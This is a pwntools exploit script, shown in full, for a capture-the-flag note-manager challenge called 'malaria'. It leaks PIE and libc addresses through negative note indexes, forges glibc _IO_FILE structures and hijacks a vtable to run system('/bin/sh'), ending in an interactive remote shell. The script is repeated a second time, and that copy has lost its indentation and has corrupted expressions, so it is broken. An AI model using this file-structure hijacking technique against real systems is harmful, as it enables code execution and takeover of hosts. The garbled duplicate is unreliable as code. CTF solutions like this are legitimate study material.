hkraw/malaria.expl.py

## malaria.expl.py
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
from IO_FILE import *
import random

#Utils
def addnote(idx,size,data,silent=False,shell=False):
	io.sendlineafter('>> ','1')
	io.sendlineafter('Index : ',f'{idx}')
	io.sendlineafter('Size : ',f'{size}')
	if silent==False:
		io.sendafter('Content: ',data)
	else:
		io.send(data)
def shownote(idx):
	io.sendlineafter('>> ','2')
	io.sendlineafter('IDX : ',f'{idx}')
	data = io.recvline().strip()
	return data

def deletenote(idx):
	io.sendlineafter('>> ','3')
	io.sendlineafter('IDX : ',f'{idx}')

#Addr
free = 0x40c650
_IO_2_1_stdin_ = 0x3eba00
system = 0x4f4e0
str_binsh = 0x1b40fa
_IO_list_all = 0x3ec660
_IO_file_jumps = 0x3e82a0
_IO_str_jumps = _IO_file_jumps+0xc0
_IO_str_overflow = _IO_str_jumps+0x18

#Exploit
if __name__ == '__main__':
#	io = process('./malaria')
	io = remote('pwn.game.alcapwnctf.in',42147)

	pie_base = u64(shownote(-7).ljust(8,b'\x00'))-0x202008
	print(f'Pie: {pie_base:x}')
	io.sendlineafter('>> ','4')
	IO_file = IO_FILE_plus(arch=64)
	stream = IO_file.construct(
			flags=0xfbad1800,
			read_ptr=0,
			read_end=0,
			read_base=0,
			write_base=pie_base+0x202020,
			write_ptr=pie_base+0x202050	,
			write_end=pie_base+0x202050,
			buf_base=pie_base+0x202050,
			buf_end=pie_base+0x202050+0x1)
	addnote(-4,0x228,stream[0x0:0x9*8]+p64(0x0)*5+p64(0x1)+b'\n',silent=True)
	io.recvn(0x6c)
	libc_leak = u64(io.recvn(0x20)[0x10:0x18])
	libc_base = libc_leak - _IO_2_1_stdin_
	print(f'Libc: {libc_base:x}')

	stream = IO_file.construct(
		flags=0,buf_base=0,
		buf_end=(libc_base+str_binsh-100)//2,write_ptr=(libc_base+str_binsh-100)//2,
		write_base=0,
		lock=libc_base+_IO_list_all+0x8,
		vtable=libc_base+_IO_str_overflow-0x38)
	stream += p64(libc_base+system)

	io.sendlineafter('>> ','4')
	addnote(-4,0x228,stream+b'\n',silent=True)
	io.interactive()
	#!/usr/bin/python3
	from pwn import *
	from past.builtins import xrange
	from time import sleep
	from IO_FILE import *
	import random

	#Utils
	def addnote(idx,size,data,silent=False,shell=False):
	io.sendlineafter('>> ','1')
	io.sendlineafter('Index : ',f'{idx}')
	io.sendlineafter('Size : ',f'{size}')
	if silent==False:
	io.sendafter('Content: ',data)
	else:
	io.send(data)
	def shownote(idx):
	io.sendlineafter('>> ','2')
	io.sendlineafter('IDX : ',f'{idx}')
	data = io.recvline().strip()
	return data

	def deletenote(idx):
	io.sendlineafter('>> ','3')
	io.sendlineafter('IDX : ',f'{idx}')

	#Addr
	free = 0x40c650
	_IO_2_1_stdin_ = 0x3eba00
	system = 0x4f4e0
	str_binsh = 0x1b40fa
	_IO_list_all = 0x3ec660
	_IO_file_jumps = 0x3e82a0
	_IO_str_jumps = _IO_file_jumps+0xc0
	_IO_str_overflow = _IO_str_jumps+0x18

	#Exploit
	if __name__ == '__main__':
	# io = process('./malaria')
	io = remote('pwn.game.alcapwnctf.in',42147)

	pie_base = u64(shownote(-7).ljust(8,b'\x00'))-0x202008
	print(f'Pie: {pie_base:x}')
	io.sendlineafter('>> ','4')
	IO_file = IO_FILE_plus(arch=64)
	stream = IO_file.construct(
	flags=0xfbad1800,
	read_ptr=0,
	read_end=0,
	read_base=0,
	write_base=pie_base+0x202020,
	write_ptr=pie_base+0x202050 ,
	write_end=pie_base+0x202050,
	buf_base=pie_base+0x202050,
	buf_end=pie_base+0x202050+0x1)
	addnote(-4,0x228,stream[0x0:0x98]+p64(0x0)5+p64(0x1)+b'\n',silent=True)
	io.recvn(0x6c)
	libc_leak = u64(io.recvn(0x20)[0x10:0x18])
	libc_base = libc_leak - _IO_2_1_stdin_
	print(f'Libc: {libc_base:x}')

	stream = IO_file.construct(
	flags=0,buf_base=0,
	buf_end=(libc_base+str_binsh-100)//2,write_ptr=(libc_base+str_binsh-100)//2,
	write_base=0,
	lock=libc_base+_IO_list_all+0x8,
	vtable=libc_base+_IO_str_overflow-0x38)
	stream += p64(libc_base+system)

	io.sendlineafter('>> ','4')
	addnote(-4,0x228,stream+b'\n',silent=True)
	io.interactive()